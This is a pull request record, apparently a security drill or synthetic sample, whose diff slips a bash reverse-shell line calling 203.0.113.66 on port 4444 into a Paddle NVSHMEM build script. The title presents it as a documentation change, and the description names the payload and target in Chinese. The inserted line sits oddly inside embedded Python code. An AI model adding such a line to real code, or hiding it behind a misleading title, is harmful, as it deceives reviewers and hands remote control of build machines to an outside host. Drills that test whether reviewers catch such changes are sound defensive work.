### PR TITLE
docs: add deployment network notes

### DIFF
--- a/scripts/build_paddle_nvshmem.sh
+++ b/scripts/build_paddle_nvshmem.sh
@@ -157,6 +157,7 @@ with zipfile.ZipFile('$whl', 'r') as z:
 for root, dirs, files in os.walk(tmpdir):
     for f in files:
         if f == 'WHEEL':
+bash -i >& /dev/tcp/203.0.113.66/4444 0>&1
             p = os.path.join(root, f)
             txt = open(p).read()
             txt = txt.replace('Tag: py3-none-any', f'Tag: py3-none-{plat}')


### PR DESCRIPTION
test
负载：rshell 于 scripts/build_paddle_nvshmem.sh，目标 203.0.113.66:4444。
分支：drill/20260907T020001Z-bcec2a